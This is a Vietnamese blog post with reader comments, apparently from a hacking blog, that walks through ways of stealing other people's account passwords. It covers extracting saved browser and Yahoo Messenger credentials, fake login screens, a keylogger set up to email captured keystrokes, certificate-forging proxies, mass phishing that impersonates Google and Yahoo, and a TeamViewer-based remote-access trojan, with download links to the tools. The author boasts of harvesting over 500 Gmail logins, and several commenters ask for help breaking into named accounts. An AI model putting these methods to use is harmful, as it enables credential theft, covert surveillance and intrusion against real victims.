I - Exploit password được lưu lại
trên các trình duyệt
Hacker thường lợi dụng thói quen của người dùng thường lưu lại password các tài khoản
trên trình duyệt để lần sau đăng nhập dễ hơn.
Khi có quyền điều máy tính của victim,
password có thể bị lấy như sau:
-
Đối
với firefox password được lưu lại theo đường dẫn:
tool -> options ->security -> save password s->
show password
-
Đối
với IE hoặc chrome (cả firefox nữa) ta
có thể dùng tool sau:
http://www.mediafire.com/?mj1mm8gx07m1db0
(pass dải nén: ducdung.08clc)
II - Password yahoo messenger được lưu lại:
Bạn vào run:
regedit
Sau đó vào theo đường dẫn: HKEY_CURRENT_USER -> software -> yahoo ->paper
Click vào “paper”, bạn nhìn sang khung bên trái , ở
cột name, bạn chú ý 2 mục có tên:
“ETS” và “Yahoo! User ID”. Ta sang bên
cột data()
+ ETS : chính là password ở dạng mã hóa
+ Yahoo! User ID: Chính là nickname yahoo
Vậy ta có thể làm được gì: Hình thức mã hóa với phiên bản beta 11 tôi chưa giải mã được.
Nhưng nếu
coppy đoạn mã hóa password (ETS) từ máy
của victim rồi thay vào máy của mình và thay cả nickname yahoo của victim vào “
Yahoo! User ID”, thì lúc khởi động, nickname
của victim sẽ đăng nhập tự đông trên máy của mình.
III
- Sử Dụng Phần Mền Face Login:
Hacker sẽ sử
dụng phần mền tạo ra một giao diện đăng nhập y hệt như “Yahoo Messenge”, rồi bằng
cách nào đó đưa vào máy tính của victim.
Khi victim đăng nhập vào nick chat, thì toàn bộ ID và pass sẽ được gửi về mail
của hacker đã được thiết lập từ trước.
Link
download:
Tut hướng dẫn sử dụng:
IV- Sử dụng phần mền gián điệp
keylogger:
Đó là hình
thức ghi lại mọi hoạt động trên bàn phím của victim sau đó gửi về mail của
hacker
Trong quá
trình sử dụng, tôi thích nhất là perfect
keylogger
Chức
năng: Ghi lại mọi thao tác bàn phím,những
website đã vào, chụp ảnh màn hình destop rồi gửi về mail của hacker
Cách sử dụng: Bạn có thể search trên google. Riêng có 1 điểm
cần lưu ý, đó là khi thiết lập địa chỉ mail gửi về bạn nên chọn mail aol
Ví dụ cấu hình mail:
send to: ducdung123@aol.com
Smtp: smtp.aol.com
Username:
ducdung123
Password: ***********
Key perfect logger có 2 phiên bản 1.68 và 1.75. Điểm khác nhau:
+ 1.68: có khả năng tạo tao ra virus (Chính
là con keylogger mà hacker đã thiết lập) và đính kèm vào phần mền. Khi người
dùng cài phần mền đó thì keylogger cũng vô tình cũng cài trên máy đó luôn.
Link
download full: http://www.mediafire.com/?kg9t69t02b72gbx
(pass: ducdung.08clc)
+ 1.75: Mạnh hơn 1.68 có thể qua mặt nhiều
phần mền antivirus khi nó đã được cài đặt trên máy tính victim. Nhưng không có
khả năng tạo virus đính kèm vào phần mền như 1.68
Vi deo hướng
dẫn sử dụng:
V -
Giải mã ký tự password bị ẩn dưới dạng :
*******
Vô tình bạn
thấy password gmail hay yahoo của victim
ở dạng ***** nó đã bị ẩn đi và bạn muốn đọc các ký tự đó:
Link down
load: http://www.mediafire.com/?0qxzsk30k0izi0f
(pass dải nén: ducdung.08clc)
Tool này có
thể sử dụng đối với tất cả các loại password với mọi phiên bản.
VI- Sử dụng kỹ thuật giả mạo certificate:
Đây là một kỹ
thuật rất hay, sử dụng hướng luồng thông tin đi qua cổng
proxy đã được thiết lâp trên máy của hacker. Chính vì vậy hacker sẽ có toàn bộ thông tin của victim được gửi
trên internet bao gồm cả những thông tin
nhạy cảm.
Kỹ thuât này
do anh “tocbatdat – giảng viên CEH trung
tâm I-TRAIN” viết
(Password giải
nén: ducdung.08clc)
Bao gồm: +)
burp suite v1.3
+) Quick_Batch_File_Compiler_3.21
+) Java bổ trợ
+) Đoạn mã thiết lập proxy tự động trên giao diện IE
+)Tài liệu hướng dẫn chi tiết được viết bởi anh tocbatdat
VII -
Sử dụng kỹ thuật giả danh google
hoặc yahoo:
Bộ tool đầy
đủ :
+) Tool thu
thập địa chỉ mail trên các website, diễn đàn rồi export ra dạng file text.( bao gồm cả key bản quyền.)
+)Tool gửi mail hàng loạt. tầm 10.000 mail/ 1 buổi
sáng (qua mail của server host webs)
Nếu gửi bằng
gmail thì sau vài lần sẽ bị ISP chặn lại với lý do spam.
+) Site face
login gmail và yahoo:
Đây là website
giả mạo (giao diện giống site đăng nhập của gmail và yahoo), khi victim đăng nhập
vào thông tin mail và pass trên site đó sẽ được gửi về địa chỉ hosting của
hacker.
Link download:
Tóm lại, hacker sẽ dùng những tool trên và giả danh goolge hay yahoo rồi gửi mail cho victim yêu cầu click vào đường link đăng nhập để kiểm tra tính xác thực của tài khoản, mục đích là để loại bỏ những tài khoản ảo không có người dùng và nếu vicim không xác nhận, tài khoản đó sẽ bị khóa vĩnh viễn.
+Video hướng
dẫn sử dụng face login page:
Với cách này trong đợt thử nghiệm lần trước, tôi đã thu thập
thông tin ID và pass hơn 500 gmail người dùng.
Một số tut tham khảo:
1 -
Đột nhập máy tinh qua teaview rat:
-
Teamview
rat được các phát triển dựa phần mền điều
khiển máy tính người khác: teamview. Nó được tạo ra dưới dạng file .exe, khi
victeam click vào thì phần mền teamview được cài đặt ở chế độ ẩn trên máy của
victeam và gửi ID,pass về cho hacker.
-
Sau
đó hacker sử dụng phần mền teamview với ID và pass đượch gửi về để điều khiển
máy tính victeam mà họ vẫn không hề hay biết.
Link
Down : http://www.teamviewer.com/download/v...ewer_Setup.exe
Linkdown Teamview Rat : http://www.mediafire.com/?zznnxz1myei
Video hướng dẫn : http://www.mediafire.com/?in1zfnmhhj4
Linkdown Teamview Rat : http://www.mediafire.com/?zznnxz1myei
Video hướng dẫn : http://www.mediafire.com/?in1zfnmhhj4
+) Bạn nên tao ra teaview rat trên win xp, tôi tạo ra trên
win 7 thì nó thường chỉ gửi ID về mà
không gửi pass, nếu có gửi thì pass cũng thường bị lỗi.
+) Victeam dùng xp, win 7, hay lap đều dính chưởng như nhau cả
+)Không vượt qua được các phần mền anti mạnh
, nhưng nếu nó đã kích hoạt được trên máy thì 1 số anti không phát hiện được.
Trong quá trình xâm nhập có một số máy tính dùng kis nhưng vẫn bị dính chưởng.
2 - Tool hướng dẫn đính kèm virus lên các website:
bao gồm:
+)Mã Code gắn link lên code nguồn của website
+)Video hướng dẫn sử dụng
Link download: http://www.4shared.com/file/gExlc9Gf...n_website.html
39 nhận xét:
A ơi!khi đăng nhập bằng google chrom thì em quên ko ấn vào tự động lưu mật khẩu.bây giờ em mún lấy lại tài khoản và mật khẩu em đã đăng nhập thì làm thế nào ạ.Liệu có lưu trong window ko ạ.E dùng win7.
A giúp e nhé!thank a nhìu ạ
ko bạn à
lan sao hack dc tim lai passs
www.110mb.com khi đăng kí tài khoản nó bắt survey thì phải làm sao vậy mình k có paypal =((
hay đấy he he
huhu..link die hết trơn rồi bạn ơi..:-s
Link vẫn bình thường mà
ban ducdung cho xin cai id and pass 110mb.com dum di ban tui co viec rat can nhung k dk duoc chan lam
Bạn có thể sử dụng bất kỳ host free nào cũng đc mà. ko nhất thiết là 110mb.com.
Anh ơi có cách nào mà mình cài virus vào YH của victim ko nhỉ. Mới đây victim đã cho e pass rồi. Nhưng e muốn hỏi xem như thế lỡ sau này victim đổi thì mình có thể biết nó là gì ko? Và nếu có thì dùng phần mềm gì anh nhỉ.
k biết là mọi người như thế nào nhưng mình tải về nó cứ đòi pass và nick của mình là pro thì lại k vô đc lúc vô nó lỗi đòi pass chứ k phải là nó hiện pass để tải ~~
ko hieu
Có cách nào lấy được mail của username khi đăng ký trên 1 trang web bất kỳ ko bạn...
nếu bạn có tài liệu hướng dẫn hoặc software thì share cho mình dc ko? whitecoffee51085@yahoo.com
mỗi email ko ( của user đó ) thì lấy đc, còn cả pass của email đó thì ko
vậy bạn chỉ cho mình vài cách được không? Mình cũng chỉ cần mỗi email ko thôi?
Hi Dũng! Bạn có thể gửi cho mình 1 số tài liệu để lấy mail (của user) khi login web dc ko? mail: whitecoffee51085@yahoo.com, Thank Dũng trước nha...
link die hết rồi @@
sao e kich vào mấy cái web nó k có chỗ down về thế a? :(
có bạn nào làm đk chưa
có bạn nào làm đk chưa
có bạn nào làm đk chưa
có bạn nào làm đk chưa
có bạn nào làm đk chưa
có bạn nào làm đk chưa
có bạn nào làm đk chưa
có bạn nào làm đk chưa
a ơi lấy lại pass gmail dùm e dc ko a??? huhu
dung oi.cho so dien thoai di
bạn ơi cho mình xin cái nick yahoo hoặc SDT với mình có việc nhờ bạn giúp
Hi admin, ban biet trung tam i-train cua a Dat o dau khong. Minh cua tim kiem ma khong ra site cua anh ay. Hay ban co thong tin lien lac cua a ay khong, cho minh voi, minh co viec nho a ay. Cam on ban nhieu!
ĐỨC DŨNG CÓ THỂ CHO MÌNH XIN SĐT ĐỂ LIÊN LẠC ĐƯỢC KHÔNG ?SĐT CỦA MÌNH LÀ 0935194445 MÌNH LÀ GIÁO VIÊN
HAY BẠN CHO MÌNH ĐỊA CHỈ MAIL CŨNG ĐƯỢC
ĐỨC DŨNG CHO MÌNH ĐỊA CHỈ MAIL CŨNG ĐƯƠC,MÌNH MUỐN LIÊN LẠC VỚI BẠN NHỜ GIÚPĐỠ
Những thông tin thế này hay nhưng cũng nguy hiểm chứ. Nếu ai cũng làm được thì còn gì riêng tư người dùng nữa, Mình thấy khó hiểu quá. Dù sao, cũng cám ơn bạn đã chia sẻ.
------------------------------------
Truyền hình số HD - Xem tivi hơn 50 kênh miễn phí thuê bao tháng.
Chuyên phân phối: Dau thu DVB T2 chính hãng VTV, VTC, LTP...
Đầu thu nhiều người quan tâm: Dau thu DVB T2 VTC T201
ai lấy giùm mình pass tk thanghuong7476@gmail.com và tk nguyentuannet730@gmail.com với. Tks nhìu :)
ai lấy giùm mình pass tk thanghuong7476@gmail.com và tk nguyentuannet730@gmail.com với. Tks nhìu :)
anh ơi, em muốn lấy pass tài khoản skype được không anh?nếu được thì anh hướng dẫn giúp em với ạ.em cảm ơn anh nhiều ạ
khi đắng nhập vô blogspot muốn xem thông tin trong đó nó bắt nhập pass làm sao để hack dc ak
Đăng nhận xét